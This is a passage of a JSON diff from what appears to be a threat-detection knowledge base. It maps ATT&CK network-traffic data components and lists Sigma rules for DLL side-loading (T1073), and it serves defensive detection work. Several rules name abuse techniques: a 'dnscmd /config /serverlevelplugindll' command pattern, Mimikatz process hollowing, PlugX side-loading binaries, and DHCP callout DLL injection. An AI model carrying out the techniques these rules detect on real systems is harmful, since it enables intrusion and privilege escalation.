"Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + } + ], + "external_reference": [ + "https://blogs.forcepoint.com/security-labs/carbanak-group-uses-google-malware-command-and-control", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://securelist.com/the-dropping-elephant-actor/75328/", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf", + "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", + null + ] + }, + { + "technique_id": "T1073", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "action": "global", + "title": "DNS ServerLevelPluginDll Install", + "id": "e61e8a88-59a9-451c-874e-70fcc9740d67", + "status": "experimental", + "description": "Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required)", + "references": [ + "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83" + ], + "date": "2017/05/08", + "author": "Florian Roth", + "tags": [ + "attack.defense_evasion", + "attack.t1073" + ], + "detection": { + "condition": "1 of them" + }, + "fields": [ + "EventID", + "CommandLine", + "ParentCommandLine", + "Image", + "User", + "TargetObject" + ], + "falsepositives": [ + "unknown" + ], + "level": "high" + }, + { + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "dnsregmod": { + "EventID": 13, + "TargetObject": "*\\services\\DNS\\Parameters\\ServerLevelPluginDll" + } + } + }, + { + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "dnsadmin": { + "CommandLine": "dnscmd.exe /config /serverlevelplugindll *" + } + } + }, + { + "title": "Possible Process Hollowing Image Loading", + "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", + "status": "experimental", + "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", + "references": [ + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for.html" + ], + "author": "Markus Neis", + "date": "2018/01/07", + "tags": [ + "attack.defense_evasion", + "attack.t1073" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 7, + "Image": [ + "*\\notepad.exe" + ], + "ImageLoaded": [ + "*\\samlib.dll", + "*\\WinSCard.dll" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Very likely, needs more tuning" + ], + "level": "high" + }, + { + "title": "Executable used by PlugX in Uncommon Location - Sysmon Version", + "id": "aeab5ec5-be14-471a-80e8-e344418305c2", + "status": "experimental", + "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading started from an uncommon location", + "references": [ + "http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/", + "https://countuponsecurity.com/2017/06/07/threat-hunting-in-the-enterprise-with-appcompatprocessor/" + ], + "author": "Florian Roth", + "date": "2017/06/12", + "tags": [ + "attack.s0013", + "attack.defense_evasion", + "attack.t1073" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection_cammute": { + "Image": "*\\CamMute.exe" + }, + "filter_cammute": { + "Image": "*\\Lenovo\\Communication Utility\\\\*" + }, + "selection_chrome_frame": { + "Image": "*\\chrome_frame_helper.exe" + }, + "filter_chrome_frame": { + "Image": "*\\Google\\Chrome\\application\\\\*" + }, + "selection_devemu": { + "Image": "*\\dvcemumanager.exe" + }, + "filter_devemu": { + "Image": "*\\Microsoft Device Emulator\\\\*" + }, + "selection_gadget": { + "Image": "*\\Gadget.exe" + }, + "filter_gadget": { + "Image": "*\\Windows Media Player\\\\*" + }, + "selection_hcc": { + "Image": "*\\hcc.exe" + }, + "filter_hcc": { + "Image": "*\\HTML Help Workshop\\\\*" + }, + "selection_hkcmd": { + "Image": "*\\hkcmd.exe" + }, + "filter_hkcmd": { + "Image": [ + "*\\System32\\\\*", + "*\\SysNative\\\\*", + "*\\SysWowo64\\\\*" + ] + }, + "selection_mc": { + "Image": "*\\Mc.exe" + }, + "filter_mc": { + "Image": [ + "*\\Microsoft Visual Studio*", + "*\\Microsoft SDK*", + "*\\Windows Kit*" + ] + }, + "selection_msmpeng": { + "Image": "*\\MsMpEng.exe" + }, + "filter_msmpeng": { + "Image": [ + "*\\Microsoft Security Client\\\\*", + "*\\Windows Defender\\\\*", + "*\\AntiMalware\\\\*" + ] + }, + "selection_msseces": { + "Image": "*\\msseces.exe" + }, + "filter_msseces": { + "Image": [ + "*\\Microsoft Security Center\\\\*", + "*\\Microsoft Security Client\\\\*", + "*\\Microsoft Security Essentials\\\\*" + ] + }, + "selection_oinfo": { + "Image": "*\\OInfoP11.exe" + }, + "filter_oinfo": { + "Image": "*\\Common Files\\Microsoft Shared\\\\*" + }, + "selection_oleview": { + "Image": "*\\OleView.exe" + }, + "filter_oleview": { + "Image": [ + "*\\Microsoft Visual Studio*", + "*\\Microsoft SDK*", + "*\\Windows Kit*", + "*\\Windows Resource Kit\\\\*" + ] + }, + "selection_rc": { + "Image": "*\\rc.exe" + }, + "filter_rc": { + "Image": [ + "*\\Microsoft Visual Studio*", + "*\\Microsoft SDK*", + "*\\Windows Kit*", + "*\\Windows Resource Kit\\\\*", + "*\\Microsoft.NET\\\\*" + ] + }, + "condition": "( selection_cammute and not filter_cammute ) or ( selection_chrome_frame and not filter_chrome_frame ) or ( selection_devemu and not filter_devemu ) or ( selection_gadget and not filter_gadget ) or ( selection_hcc and not filter_hcc ) or ( selection_hkcmd and not filter_hkcmd ) or ( selection_mc and not filter_mc ) or ( selection_msmpeng and not filter_msmpeng ) or ( selection_msseces and not filter_msseces ) or ( selection_oinfo and not filter_oinfo ) or ( selection_oleview and not filter_oleview ) or ( selection_rc and not filter_rc )" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "DHCP Server Loaded the CallOut DLL", + "id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", + "status": "experimental", + "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", + "references": [ + "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", + "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx" + ], + "date": "2017/05/15", + "author": "Dimitrios Slamaris", + "tags": [ + "attack.defense_evasion", + "attack.t1073" + ], + "logsource": { + "product": "windows", + "service": "system" + }, + "detection": { + "selection": { + "EventID": 1033 + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "critical" + }, + { + "title": "DHCP Server Error Failed Loading the CallOut DLL", + "id": "75edd3fd-7146-48e5-9848-3013d7f0282c", + "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", + "status": "experimental", + "references": [ + "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", + "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx" + ], + "date": "2017/05/15", + "modified": "2019/07/17", + "tags": [ + "attack.defense_evasion", + "attack.t1073" + ], + "author": "Dimitrios Slamaris, @atc_project (fix)", + "logsource": { + "product": "windows", + "service": "system" + }, + "detection": { + "selection": { + "EventID": [ + 1031, + 1032, + 1034 + ], + "Source": "Microsoft-Windows-DHCP-Server" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "critical" + }, + { + "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL", + "id": "cbe51394-cd93-4473-b555-edf0144952d9", + "description": "This rule detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", + "status": "experimental", + "date": "2017/05/08", + "references": [ + "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", + "https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx", + "https://twitter.com/gentilkiwi/status/861641945944391680" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1073" + ], + "author": "Florian Roth", + "logsource": { + "product": "windows", + "service": "dns-server" + }, + "detection": { + "selection": { + "EventID": [ + 150, + 770 + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "critical" + }, + { + "title": "Suspicious GUP Usage", + "id": "0a4f6091-223b-41f6-8743-f322ec84930b", + "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", + "status": "experimental", + "references": [ + "https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1073" + ], + "author": "Florian Roth", + "date": "2019/02/06", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": "*\\GUP.exe" + }, + "filter": { + "Image": [ + "C:\\Users\\\\*\\AppData\\Local\\Notepad++\\updater\\gup.exe", + "C:\\Users\\\\*\\AppData\\Roaming\\Notepad++\\updater\\gup.exe", + "C:\\Program Files\\Notepad++\\updater\\gup.exe", + "C:\\Program Files (x86)\\Notepad++\\updater\\gup.exe" + ] + }, + "condition": "selection and not filter" + }, + "falsepositives": [ + "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" + 